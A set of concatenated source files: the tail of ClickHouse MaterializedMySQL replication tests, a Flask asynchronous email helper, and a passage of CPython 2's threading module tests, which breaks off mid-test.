    # Insert the maximal enum value after the initial dump.
    mysql_node.query("INSERT INTO materialize_with_enum8_test.test (id, value) VALUES (3, '127')")
    check_query(clickhouse_node, "SELECT value FROM materialize_with_enum8_test.test ORDER BY id", "1\n2\n127\n")
    check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_enum8_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(Enum8(" + enum8_values_with_backslash + "))\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    clickhouse_node.query("DROP DATABASE materialize_with_enum8_test")
    mysql_node.query("DROP DATABASE materialize_with_enum8_test")
def materialize_with_enum16_test(clickhouse_node, mysql_node, service_name):
    """Replicate a MySQL ENUM column with 600 entries (beyond the Enum8 range)
    and check it appears as Nullable(Enum16(...)) on the ClickHouse side."""
    mysql_node.query("DROP DATABASE IF EXISTS materialize_with_enum16_test")
    clickhouse_node.query("DROP DATABASE IF EXISTS materialize_with_enum16_test")
    mysql_node.query("CREATE DATABASE materialize_with_enum16_test")
    enum16_values_count = 600
    # "'1', '2', ..., '600'" -- the ENUM list used in the MySQL DDL.
    enum16_values = ", ".join(f"'{i}'" for i in range(1, enum16_values_count + 1))
    # "\'1\' = 1, ..." -- the escaped form DESCRIBE TABLE prints back.
    enum16_values_with_backslash = ", ".join(f"\\'{i}\\' = {i}" for i in range(1, enum16_values_count + 1))
    mysql_node.query("CREATE TABLE materialize_with_enum16_test.test (id int NOT NULL PRIMARY KEY, value ENUM(" + enum16_values + ")) ENGINE=InnoDB")
    mysql_node.query("INSERT INTO materialize_with_enum16_test.test (id, value) VALUES (1, '1'),(2, '2')")
    clickhouse_node.query(f"CREATE DATABASE materialize_with_enum16_test ENGINE = MaterializedMySQL('{service_name}:3306', 'materialize_with_enum16_test', 'root', 'clickhouse')")
    check_query(clickhouse_node, "SELECT value FROM materialize_with_enum16_test.test ORDER BY id", "1\n2\n")
    # Insert a high enum value after the initial dump.
    mysql_node.query("INSERT INTO materialize_with_enum16_test.test (id, value) VALUES (3, '500')")
    check_query(clickhouse_node, "SELECT value FROM materialize_with_enum16_test.test ORDER BY id", "1\n2\n500\n")
    check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_enum16_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(Enum16(" + enum16_values_with_backslash + "))\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    clickhouse_node.query("DROP DATABASE materialize_with_enum16_test")
    mysql_node.query("DROP DATABASE materialize_with_enum16_test")
def alter_enum8_to_enum16_test(clickhouse_node, mysql_node, service_name):
    """Start with a 100-entry ENUM (replicated as Enum8), then ALTER the column
    to 600 entries and check ClickHouse switches it to Enum16 and keeps data."""
    mysql_node.query("DROP DATABASE IF EXISTS alter_enum8_to_enum16_test")
    clickhouse_node.query("DROP DATABASE IF EXISTS alter_enum8_to_enum16_test")
    mysql_node.query("CREATE DATABASE alter_enum8_to_enum16_test")

    enum8_values_count = 100
    # "'1', ..., '100'" for the DDL and its escaped DESCRIBE form.
    enum8_values = ", ".join(f"'{i}'" for i in range(1, enum8_values_count + 1))
    enum8_values_with_backslash = ", ".join(f"\\'{i}\\' = {i}" for i in range(1, enum8_values_count + 1))
    mysql_node.query("CREATE TABLE alter_enum8_to_enum16_test.test (id int NOT NULL PRIMARY KEY, value ENUM(" + enum8_values + ")) ENGINE=InnoDB")
    mysql_node.query("INSERT INTO alter_enum8_to_enum16_test.test (id, value) VALUES (1, '1'),(2, '2')")
    clickhouse_node.query(f"CREATE DATABASE alter_enum8_to_enum16_test ENGINE = MaterializedMySQL('{service_name}:3306', 'alter_enum8_to_enum16_test', 'root', 'clickhouse')")
    mysql_node.query("INSERT INTO alter_enum8_to_enum16_test.test (id, value) VALUES (3, '75')")
    check_query(clickhouse_node, "SELECT value FROM alter_enum8_to_enum16_test.test ORDER BY id", "1\n2\n75\n")
    check_query(clickhouse_node, "DESCRIBE TABLE alter_enum8_to_enum16_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(Enum8(" + enum8_values_with_backslash + "))\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")

    enum16_values_count = 600
    # "'1', ..., '600'" for the ALTER and its escaped DESCRIBE form.
    enum16_values = ", ".join(f"'{i}'" for i in range(1, enum16_values_count + 1))
    enum16_values_with_backslash = ", ".join(f"\\'{i}\\' = {i}" for i in range(1, enum16_values_count + 1))
    mysql_node.query("ALTER TABLE alter_enum8_to_enum16_test.test MODIFY COLUMN value ENUM(" + enum16_values + ")")
    check_query(clickhouse_node, "DESCRIBE TABLE alter_enum8_to_enum16_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(Enum16(" + enum16_values_with_backslash + "))\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    mysql_node.query("INSERT INTO alter_enum8_to_enum16_test.test (id, value) VALUES (4, '500')")
    check_query(clickhouse_node, "SELECT value FROM alter_enum8_to_enum16_test.test ORDER BY id", "1\n2\n75\n500\n")

    clickhouse_node.query("DROP DATABASE alter_enum8_to_enum16_test")
    mysql_node.query("DROP DATABASE alter_enum8_to_enum16_test")
def move_to_prewhere_and_column_filtering(clickhouse_node, mysql_node, service_name):
    """Regression test: queries over MaterializedMySQL tables that filter on
    key columns or on columns not in the SELECT list (conditions eligible to
    be moved to PREWHERE) must still return correct rows, including when the
    filtered column is nullable."""
    clickhouse_node.query("DROP DATABASE IF EXISTS cond_on_key_col")
    mysql_node.query("DROP DATABASE IF EXISTS cond_on_key_col")
    mysql_node.query("CREATE DATABASE cond_on_key_col")
    clickhouse_node.query("CREATE DATABASE cond_on_key_col ENGINE = MaterializedMySQL('{}:3306', 'cond_on_key_col', 'root', 'clickhouse')".format(service_name))

    # Case 1: ILIKE on a text column combined with an equality on another column.
    mysql_node.query("create table cond_on_key_col.products (id int primary key, product_id int not null, catalog_id int not null, brand_id int not null, name text)")
    mysql_node.query("insert into cond_on_key_col.products (id, name, catalog_id, brand_id, product_id) values (915, 'ertyui', 5287, 15837, 0), (990, 'wer', 1053, 24390, 1), (781, 'qwerty', 1041, 1176, 2);")

    # Case 2: aggregate one column while filtering on a different one.
    mysql_node.query("create table cond_on_key_col.test (id int(11) NOT NULL AUTO_INCREMENT, a int(11) DEFAULT NULL, b int(11) DEFAULT NULL, PRIMARY KEY (id)) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8mb4;")
    mysql_node.query("insert into cond_on_key_col.test values (42, 123, 1);")

    # Case 3: wide table with many nullable columns and secondary indexes;
    # filter on an indexed tinyint column.
    mysql_node.query("CREATE TABLE cond_on_key_col.balance_change_record (id bigint(20) NOT NULL AUTO_INCREMENT, type tinyint(4) DEFAULT NULL, value decimal(10,4) DEFAULT NULL, time timestamp NULL DEFAULT NULL, "
                     "initiative_id varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, passivity_id varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, "
                     "person_id varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, tenant_code varchar(50) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, "
                     "created_time timestamp NULL DEFAULT CURRENT_TIMESTAMP COMMENT '创建时间', updated_time timestamp NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, "
                     "value_snapshot decimal(10,4) DEFAULT NULL, PRIMARY KEY (id), KEY balance_change_record_initiative_id (person_id) USING BTREE, "
                     "KEY type (type) USING BTREE, KEY balance_change_record_type (time) USING BTREE, KEY initiative_id (initiative_id) USING BTREE, "
                     "KEY balance_change_record_tenant_code (passivity_id) USING BTREE, KEY tenant_code (tenant_code) USING BTREE) ENGINE=InnoDB AUTO_INCREMENT=1691049 DEFAULT CHARSET=utf8")
    mysql_node.query("insert into cond_on_key_col.balance_change_record values (123, 1, 3.14, null, 'qwe', 'asd', 'zxc', 'rty', null, null, 2.7);")

    # Case 4: filter on a nullable varchar column (one row has c2 = NULL).
    mysql_node.query("CREATE TABLE cond_on_key_col.test1 (id int(11) NOT NULL AUTO_INCREMENT, c1 varchar(32) NOT NULL, c2 varchar(32), PRIMARY KEY (id)) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4")
    mysql_node.query("insert into cond_on_key_col.test1(c1,c2) values ('a','b'), ('c', null);")

    check_query(clickhouse_node, "SELECT DISTINCT P.id, P.name, P.catalog_id FROM cond_on_key_col.products P WHERE P.name ILIKE '%e%' and P.catalog_id=5287", '915\tertyui\t5287\n')
    check_query(clickhouse_node, "select count(a) from cond_on_key_col.test where b = 1;", "1\n")
    check_query(clickhouse_node, "select id from cond_on_key_col.balance_change_record where type=1;", "123\n")
    check_query(clickhouse_node, "select count(c1) from cond_on_key_col.test1 where c2='b';", "1\n")

    # Cleanup.
    clickhouse_node.query("DROP DATABASE cond_on_key_col")
    mysql_node.query("DROP DATABASE cond_on_key_col")
def mysql_settings_test(clickhouse_node, mysql_node, service_name):
    """After two separate single-row inserts, reading the replicated table
    must produce two distinct blocks (COUNT(DISTINCT blockNumber()) == 2)."""
    mysql_node.query("DROP DATABASE IF EXISTS test_database")
    clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
    mysql_node.query("CREATE DATABASE test_database")
    mysql_node.query("CREATE TABLE test_database.a (id INT(11) NOT NULL PRIMARY KEY, value VARCHAR(255))")
    mysql_node.query("INSERT INTO test_database.a VALUES(1, 'foo')")
    mysql_node.query("INSERT INTO test_database.a VALUES(2, 'bar')")
    clickhouse_node.query("CREATE DATABASE test_database ENGINE = MaterializedMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(service_name))
    check_query(clickhouse_node, "SELECT COUNT() FROM test_database.a FORMAT TSV", "2\n")
    # Two inserts -> two distinct block numbers when scanning the table.
    assert clickhouse_node.query("SELECT COUNT(DISTINCT blockNumber()) FROM test_database.a FORMAT TSV") == "2\n"
    # Cleanup.
    clickhouse_node.query("DROP DATABASE test_database")
    mysql_node.query("DROP DATABASE test_database")
def materialized_mysql_large_transaction(clickhouse_node, mysql_node, service_name):
    """Apply one large UPDATE transaction (200k rows) and restart ClickHouse
    while it is being processed; after the restart the whole transaction must
    still end up applied exactly once."""
    mysql_node.query("DROP DATABASE IF EXISTS largetransaction")
    clickhouse_node.query("DROP DATABASE IF EXISTS largetransaction")
    mysql_node.query("CREATE DATABASE largetransaction")

    mysql_node.query("CREATE TABLE largetransaction.test_table ("
                     "`key` INT NOT NULL PRIMARY KEY AUTO_INCREMENT, "
                     "`value` INT NOT NULL) ENGINE = InnoDB;")
    num_rows = 200000
    rows_per_insert = 5000
    # One VALUES list reused for every batched INSERT: "(1),(1),...,(1)".
    values = ",".join("(1)" for _ in range(rows_per_insert))
    for _ in range(num_rows // rows_per_insert):
        mysql_node.query(f"INSERT INTO largetransaction.test_table (`value`) VALUES {values};")

    clickhouse_node.query(f"CREATE DATABASE largetransaction ENGINE = MaterializedMySQL('{service_name}:3306', 'largetransaction', 'root', 'clickhouse')")
    check_query(clickhouse_node, "SELECT COUNT() FROM largetransaction.test_table", f"{num_rows}\n")

    # One transaction touching every row.
    mysql_node.query("UPDATE largetransaction.test_table SET value = 2;")

    # Poll until ClickHouse has started applying the transaction, then restart
    # it mid-flight.
    while int(clickhouse_node.query("SELECT COUNT() FROM largetransaction.test_table WHERE value = 2")) == 0:
        time.sleep(0.2)
    clickhouse_node.restart_clickhouse()

    # After the restart every row must carry the updated value.
    check_query(clickhouse_node, "SELECT COUNT() FROM largetransaction.test_table WHERE value = 2", f"{num_rows}\n")

    clickhouse_node.query("DROP DATABASE largetransaction")
    mysql_node.query("DROP DATABASE largetransaction")
|
email.py | # -*- coding: utf-8 -*-
from flask_mail import Message
from flask import render_template
from threading import Thread
from app import app, mail
def send_async_email(app, msg):
    """Deliver *msg* via Flask-Mail inside an application context.

    This is run in a worker thread (see send_email), so the Flask app
    context must be pushed manually before mail.send() is called."""
    with app.app_context():
        mail.send(msg)
def send_email(receiver, subject, template, **kwargs):
    """Render ``template + '.txt'`` with *kwargs* and send it to *receiver*
    asynchronously. Returns the started worker Thread so callers can join it."""
    full_subject = app.config['FLASK_MAIL_SUBJECT_PREFIX'] + subject
    msg = Message(full_subject,
                  sender=app.config['MAIL_USERNAME'],
                  recipients=[receiver])
    msg.body = render_template(template + '.txt', **kwargs)
    worker = Thread(target=send_async_email, args=[app, msg])
    worker.start()
    return worker
|
test_threading.py | # Very rudimentary test of threading module
import test.test_support
from test.test_support import verbose
import random
import re
import sys
thread = test.test_support.import_module('thread')
threading = test.test_support.import_module('threading')
import time
import unittest
import weakref
import os
import subprocess
import lock_tests
class Counter(object):
    """A trivial mutable integer counter.

    `value` is deliberately a plain public attribute; the test threads that
    share a Counter serialize access to it with their own mutex."""

    def __init__(self):
        self.value = 0

    def inc(self):
        """Increase the count by one."""
        self.value = self.value + 1

    def dec(self):
        """Decrease the count by one."""
        self.value = self.value - 1

    def get(self):
        """Return the current count."""
        return self.value
class TestThread(threading.Thread):
    """Worker thread used by the tests below: sleeps briefly while a shared
    Counter tracks how many workers run concurrently, bounded by the
    semaphore the caller passes in."""

    def __init__(self, name, testcase, sema, mutex, nrunning):
        threading.Thread.__init__(self, name=name)
        self.testcase = testcase   # TestCase used for assertions inside run()
        self.sema = sema           # semaphore bounding concurrent workers
        self.mutex = mutex         # guards the shared nrunning counter
        self.nrunning = nrunning   # Counter of currently running workers

    def run(self):
        # Tiny random delay so workers overlap in varied interleavings.
        delay = random.random() / 10000.0
        if verbose:
            print 'task %s will run for %.1f usec' % (
                self.name, delay * 1e6)

        with self.sema:
            with self.mutex:
                self.nrunning.inc()
                if verbose:
                    print self.nrunning.get(), 'tasks are running'
                # The caller's semaphore admits at most 3 workers at once.
                self.testcase.assertTrue(self.nrunning.get() <= 3)

            time.sleep(delay)
            if verbose:
                print 'task', self.name, 'done'

            with self.mutex:
                self.nrunning.dec()
                # The counter must never go negative.
                self.testcase.assertTrue(self.nrunning.get() >= 0)
                if verbose:
                    print '%s is finished. %d tasks are running' % (
                        self.name, self.nrunning.get())
class BaseTestCase(unittest.TestCase):
    """Shared fixture: snapshot the threading state before each test and
    restore it (and reap child processes) afterwards."""
    def setUp(self):
        self._threads = test.test_support.threading_setup()
    def tearDown(self):
        test.test_support.threading_cleanup(*self._threads)
        test.test_support.reap_children()
class ThreadTests(BaseTestCase):
    """Core Thread behaviour tests: concurrency bounds, thread idents,
    stack sizes, foreign (non-threading) threads, asynchronously raised
    exceptions, limbo-map cleanup, shutdown handling and reference-cycle
    avoidance."""
    # Create a bunch of threads, let each do some work, wait until all are
    # done.
    def test_various_ops(self):
        # This takes about n/3 seconds to run (about n/3 clumps of tasks,
        # times about 1 second per clump).
        NUMTASKS = 10
        # no more than 3 of the 10 can run at once
        sema = threading.BoundedSemaphore(value=3)
        mutex = threading.RLock()
        numrunning = Counter()
        threads = []
        for i in range(NUMTASKS):
            t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
            threads.append(t)
            self.assertEqual(t.ident, None)
            self.assertTrue(re.match('<TestThread\(.*, initial\)>', repr(t)))
            t.start()
        if verbose:
            print 'waiting for all tasks to complete'
        for t in threads:
            t.join(NUMTASKS)
            self.assertTrue(not t.is_alive())
            self.assertNotEqual(t.ident, 0)
            self.assertFalse(t.ident is None)
            self.assertTrue(re.match('<TestThread\(.*, \w+ -?\d+\)>', repr(t)))
        if verbose:
            print 'all tasks done'
        self.assertEqual(numrunning.get(), 0)
    def test_ident_of_no_threading_threads(self):
        # The ident still must work for the main thread and dummy threads.
        self.assertFalse(threading.currentThread().ident is None)
        def f():
            ident.append(threading.currentThread().ident)
            done.set()
        done = threading.Event()
        ident = []
        thread.start_new_thread(f, ())
        done.wait()
        self.assertFalse(ident[0] is None)
        # Kill the "immortal" _DummyThread
        del threading._active[ident[0]]
    # run with a small(ish) thread stack size (256kB)
    def test_various_ops_small_stack(self):
        if verbose:
            print 'with 256kB thread stack size...'
        try:
            threading.stack_size(262144)
        except thread.error:
            if verbose:
                print 'platform does not support changing thread stack size'
            return
        self.test_various_ops()
        threading.stack_size(0)
    # run with a large thread stack size (1MB)
    def test_various_ops_large_stack(self):
        if verbose:
            print 'with 1MB thread stack size...'
        try:
            threading.stack_size(0x100000)
        except thread.error:
            if verbose:
                print 'platform does not support changing thread stack size'
            return
        self.test_various_ops()
        threading.stack_size(0)
    def test_foreign_thread(self):
        # Check that a "foreign" thread can use the threading module.
        def f(mutex):
            # Calling current_thread() forces an entry for the foreign
            # thread to get made in the threading._active map.
            threading.current_thread()
            mutex.release()
        mutex = threading.Lock()
        mutex.acquire()
        tid = thread.start_new_thread(f, (mutex,))
        # Wait for the thread to finish.
        mutex.acquire()
        self.assertIn(tid, threading._active)
        self.assertIsInstance(threading._active[tid], threading._DummyThread)
        del threading._active[tid]
    # PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
    # exposed at the Python level. This test relies on ctypes to get at it.
    @test.test_support.cpython_only
    def test_PyThreadState_SetAsyncExc(self):
        try:
            import ctypes
        except ImportError:
            if verbose:
                print "test_PyThreadState_SetAsyncExc can't import ctypes"
            return # can't do anything
        set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
        class AsyncExc(Exception):
            pass
        exception = ctypes.py_object(AsyncExc)
        # First check it works when setting the exception from the same thread.
        tid = thread.get_ident()
        try:
            result = set_async_exc(ctypes.c_long(tid), exception)
            # The exception is async, so we might have to keep the VM busy until
            # it notices.
            while True:
                pass
        except AsyncExc:
            pass
        else:
            # This code is unreachable but it reflects the intent. If we wanted
            # to be smarter the above loop wouldn't be infinite.
            self.fail("AsyncExc not raised")
        try:
            self.assertEqual(result, 1) # one thread state modified
        except UnboundLocalError:
            # The exception was raised too quickly for us to get the result.
            pass
        # `worker_started` is set by the thread when it's inside a try/except
        # block waiting to catch the asynchronously set AsyncExc exception.
        # `worker_saw_exception` is set by the thread upon catching that
        # exception.
        worker_started = threading.Event()
        worker_saw_exception = threading.Event()
        class Worker(threading.Thread):
            def run(self):
                self.id = thread.get_ident()
                self.finished = False
                try:
                    while True:
                        worker_started.set()
                        time.sleep(0.1)
                except AsyncExc:
                    self.finished = True
                    worker_saw_exception.set()
        t = Worker()
        t.daemon = True # so if this fails, we don't hang Python at shutdown
        t.start()
        if verbose:
            print " started worker thread"
        # Try a thread id that doesn't make sense.
        if verbose:
            print " trying nonsensical thread id"
        result = set_async_exc(ctypes.c_long(-1), exception)
        self.assertEqual(result, 0) # no thread states modified
        # Now raise an exception in the worker thread.
        if verbose:
            print " waiting for worker thread to get started"
        ret = worker_started.wait()
        self.assertTrue(ret)
        if verbose:
            print " verifying worker hasn't exited"
        self.assertTrue(not t.finished)
        if verbose:
            print " attempting to raise asynch exception in worker"
        result = set_async_exc(ctypes.c_long(t.id), exception)
        self.assertEqual(result, 1) # one thread state modified
        if verbose:
            print " waiting for worker to say it caught the exception"
        worker_saw_exception.wait(timeout=10)
        self.assertTrue(t.finished)
        if verbose:
            print " all OK -- joining worker"
        if t.finished:
            t.join()
        # else the thread is still running, and we have no way to kill it
    def test_limbo_cleanup(self):
        # Issue 7481: Failure to start thread should cleanup the limbo map.
        def fail_new_thread(*args):
            raise thread.error()
        _start_new_thread = threading._start_new_thread
        threading._start_new_thread = fail_new_thread
        try:
            t = threading.Thread(target=lambda: None)
            self.assertRaises(thread.error, t.start)
            self.assertFalse(
                t in threading._limbo,
                "Failed to cleanup _limbo map on failure of Thread.start().")
        finally:
            threading._start_new_thread = _start_new_thread
    @test.test_support.cpython_only
    def test_finalize_runnning_thread(self):
        # Issue 1402: the PyGILState_Ensure / _Release functions may be called
        # very late on python exit: on deallocation of a running thread for
        # example.
        try:
            import ctypes
        except ImportError:
            if verbose:
                print("test_finalize_with_runnning_thread can't import ctypes")
            return # can't do anything
        rc = subprocess.call([sys.executable, "-c", """if 1:
            import ctypes, sys, time, thread
            # This lock is used as a simple event variable.
            ready = thread.allocate_lock()
            ready.acquire()
            # Module globals are cleared before __del__ is run
            # So we save the functions in class dict
            class C:
                ensure = ctypes.pythonapi.PyGILState_Ensure
                release = ctypes.pythonapi.PyGILState_Release
                def __del__(self):
                    state = self.ensure()
                    self.release(state)
            def waitingThread():
                x = C()
                ready.release()
                time.sleep(100)
            thread.start_new_thread(waitingThread, ())
            ready.acquire() # Be sure the other thread is waiting.
            sys.exit(42)
            """])
        self.assertEqual(rc, 42)
    def test_finalize_with_trace(self):
        # Issue1733757
        # Avoid a deadlock when sys.settrace steps into threading._shutdown
        p = subprocess.Popen([sys.executable, "-c", """if 1:
            import sys, threading
            # A deadlock-killer, to prevent the
            # testsuite to hang forever
            def killer():
                import os, time
                time.sleep(2)
                print 'program blocked; aborting'
                os._exit(2)
            t = threading.Thread(target=killer)
            t.daemon = True
            t.start()
            # This is the trace function
            def func(frame, event, arg):
                threading.current_thread()
                return func
            sys.settrace(func)
            """],
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        self.addCleanup(p.stdout.close)
        self.addCleanup(p.stderr.close)
        stdout, stderr = p.communicate()
        rc = p.returncode
        self.assertFalse(rc == 2, "interpreted was blocked")
        self.assertTrue(rc == 0,
                        "Unexpected error: " + repr(stderr))
    def test_join_nondaemon_on_shutdown(self):
        # Issue 1722344
        # Raising SystemExit skipped threading._shutdown
        p = subprocess.Popen([sys.executable, "-c", """if 1:
            import threading
            from time import sleep
            def child():
                sleep(1)
                # As a non-daemon thread we SHOULD wake up and nothing
                # should be torn down yet
                print "Woke up, sleep function is:", sleep
            threading.Thread(target=child).start()
            raise SystemExit
            """],
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        self.addCleanup(p.stdout.close)
        self.addCleanup(p.stderr.close)
        stdout, stderr = p.communicate()
        self.assertEqual(stdout.strip(),
                         "Woke up, sleep function is: <built-in function sleep>")
        # NOTE(review): re.MULTILINE is passed as re.sub's *count* positional
        # argument here, not as flags — looks like a latent bug; confirm intent.
        stderr = re.sub(r"^\[\d+ refs\]", "", stderr, re.MULTILINE).strip()
        self.assertEqual(stderr, "")
    def test_enumerate_after_join(self):
        # Try hard to trigger #1703448: a thread is still returned in
        # threading.enumerate() after it has been join()ed.
        enum = threading.enumerate
        old_interval = sys.getcheckinterval()
        try:
            for i in xrange(1, 100):
                # Try a couple times at each thread-switching interval
                # to get more interleavings.
                sys.setcheckinterval(i // 5)
                t = threading.Thread(target=lambda: None)
                t.start()
                t.join()
                l = enum()
                self.assertNotIn(t, l,
                    "#1703448 triggered after %d trials: %s" % (i, l))
        finally:
            sys.setcheckinterval(old_interval)
    @test.test_support.cpython_only
    def test_no_refcycle_through_target(self):
        class RunSelfFunction(object):
            def __init__(self, should_raise):
                # The links in this refcycle from Thread back to self
                # should be cleaned up when the thread completes.
                self.should_raise = should_raise
                self.thread = threading.Thread(target=self._run,
                                               args=(self,),
                                               kwargs={'yet_another':self})
                self.thread.start()
            def _run(self, other_ref, yet_another):
                if self.should_raise:
                    raise SystemExit
        cyclic_object = RunSelfFunction(should_raise=False)
        weak_cyclic_object = weakref.ref(cyclic_object)
        cyclic_object.thread.join()
        del cyclic_object
        self.assertEqual(None, weak_cyclic_object(),
                         msg=('%d references still around' %
                              sys.getrefcount(weak_cyclic_object())))
        raising_cyclic_object = RunSelfFunction(should_raise=True)
        weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
        raising_cyclic_object.thread.join()
        del raising_cyclic_object
        self.assertEqual(None, weak_raising_cyclic_object(),
                         msg=('%d references still around' %
                              sys.getrefcount(weak_raising_cyclic_object())))
class ThreadJoinOnShutdown(BaseTestCase):
    """Regression tests for join()/fork() interactions around interpreter
    shutdown. Each test builds a small self-contained script and runs it
    in a subprocess, checking its output and return code."""
    # Between fork() and exec(), only async-safe functions are allowed (issues
    # #12316 and #11870), and fork() from a worker thread is known to trigger
    # problems with some operating systems (issue #3863): skip problematic tests
    # on platforms known to behave badly.
    platforms_to_skip = ('freebsd4', 'freebsd5', 'freebsd6', 'netbsd5',
                         'os2emx')
    def _run_and_join(self, script):
        # Prepend a helper thread (joiningfunc) to *script*, run the result
        # in a child interpreter and require the canonical two-line output.
        script = """if 1:
            import sys, os, time, threading
            # a thread, which waits for the main program to terminate
            def joiningfunc(mainthread):
                mainthread.join()
                print 'end of thread'
                # stdout is fully buffered because not a tty, we have to flush
                # before exit.
                sys.stdout.flush()
        \n""" + script
        p = subprocess.Popen([sys.executable, "-c", script], stdout=subprocess.PIPE)
        rc = p.wait()
        data = p.stdout.read().replace('\r', '')
        p.stdout.close()
        self.assertEqual(data, "end of main\nend of thread\n")
        self.assertFalse(rc == 2, "interpreter was blocked")
        self.assertTrue(rc == 0, "Unexpected error")
    def test_1_join_on_shutdown(self):
        # The usual case: on exit, wait for a non-daemon thread
        script = """if 1:
            import os
            t = threading.Thread(target=joiningfunc,
                                 args=(threading.current_thread(),))
            t.start()
            time.sleep(0.1)
            print 'end of main'
            """
        self._run_and_join(script)
    @unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
    @unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
    def test_2_join_in_forked_process(self):
        # Like the test above, but from a forked interpreter
        script = """if 1:
            childpid = os.fork()
            if childpid != 0:
                os.waitpid(childpid, 0)
                sys.exit(0)
            t = threading.Thread(target=joiningfunc,
                                 args=(threading.current_thread(),))
            t.start()
            print 'end of main'
            """
        self._run_and_join(script)
    @unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
    @unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
    def test_3_join_in_forked_from_thread(self):
        # Like the test above, but fork() was called from a worker thread
        # In the forked process, the main Thread object must be marked as stopped.
        script = """if 1:
            main_thread = threading.current_thread()
            def worker():
                childpid = os.fork()
                if childpid != 0:
                    os.waitpid(childpid, 0)
                    sys.exit(0)
                t = threading.Thread(target=joiningfunc,
                                     args=(main_thread,))
                print 'end of main'
                t.start()
                t.join() # Should not block: main_thread is already stopped
            w = threading.Thread(target=worker)
            w.start()
            """
        self._run_and_join(script)
    def assertScriptHasOutput(self, script, expected_output):
        # Run *script* in a child interpreter and compare its whole stdout.
        p = subprocess.Popen([sys.executable, "-c", script],
                             stdout=subprocess.PIPE)
        rc = p.wait()
        data = p.stdout.read().decode().replace('\r', '')
        self.assertEqual(rc, 0, "Unexpected error")
        self.assertEqual(data, expected_output)
    @unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
    @unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
    def test_4_joining_across_fork_in_worker_thread(self):
        # There used to be a possible deadlock when forking from a child
        # thread. See http://bugs.python.org/issue6643.
        # The script takes the following steps:
        # - The main thread in the parent process starts a new thread and then
        #   tries to join it.
        # - The join operation acquires the Lock inside the thread's _block
        #   Condition. (See threading.py:Thread.join().)
        # - We stub out the acquire method on the condition to force it to wait
        #   until the child thread forks. (See LOCK ACQUIRED HERE)
        # - The child thread forks. (See LOCK HELD and WORKER THREAD FORKS
        #   HERE)
        # - The main thread of the parent process enters Condition.wait(),
        #   which releases the lock on the child thread.
        # - The child process returns. Without the necessary fix, when the
        #   main thread of the child process (which used to be the child thread
        #   in the parent process) attempts to exit, it will try to acquire the
        #   lock in the Thread._block Condition object and hang, because the
        #   lock was held across the fork.
        script = """if 1:
            import os, time, threading
            finish_join = False
            start_fork = False
            def worker():
                # Wait until this thread's lock is acquired before forking to
                # create the deadlock.
                global finish_join
                while not start_fork:
                    time.sleep(0.01)
                # LOCK HELD: Main thread holds lock across this call.
                childpid = os.fork()
                finish_join = True
                if childpid != 0:
                    # Parent process just waits for child.
                    os.waitpid(childpid, 0)
                # Child process should just return.
            w = threading.Thread(target=worker)
            # Stub out the private condition variable's lock acquire method.
            # This acquires the lock and then waits until the child has forked
            # before returning, which will release the lock soon after. If
            # someone else tries to fix this test case by acquiring this lock
            # before forking instead of resetting it, the test case will
            # deadlock when it shouldn't.
            condition = w._block
            orig_acquire = condition.acquire
            call_count_lock = threading.Lock()
            call_count = 0
            def my_acquire():
                global call_count
                global start_fork
                orig_acquire() # LOCK ACQUIRED HERE
                start_fork = True
                if call_count == 0:
                    while not finish_join:
                        time.sleep(0.01) # WORKER THREAD FORKS HERE
                with call_count_lock:
                    call_count += 1
            condition.acquire = my_acquire
            w.start()
            w.join()
            print('end of main')
            """
        self.assertScriptHasOutput(script, "end of main\n")
    @unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
    @unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
    def test_5_clear_waiter_locks_to_avoid_crash(self):
        # Check that a spawned thread that forks doesn't segfault on certain
        # platforms, namely OS X. This used to happen if there was a waiter
        # lock in the thread's condition variable's waiters list. Even though
        # we know the lock will be held across the fork, it is not safe to
        # release locks held across forks on all platforms, so releasing the
        # waiter lock caused a segfault on OS X. Furthermore, since locks on
        # OS X are (as of this writing) implemented with a mutex + condition
        # variable instead of a semaphore, while we know that the Python-level
        # lock will be acquired, we can't know if the internal mutex will be
        # acquired at the time of the fork.
        script = """if True:
            import os, time, threading
            start_fork = False
            def worker():
                # Wait until the main thread has attempted to join this thread
                # before continuing.
                while not start_fork:
                    time.sleep(0.01)
                childpid = os.fork()
                if childpid != 0:
                    # Parent process just waits for child.
                    (cpid, rc) = os.waitpid(childpid, 0)
                    assert cpid == childpid
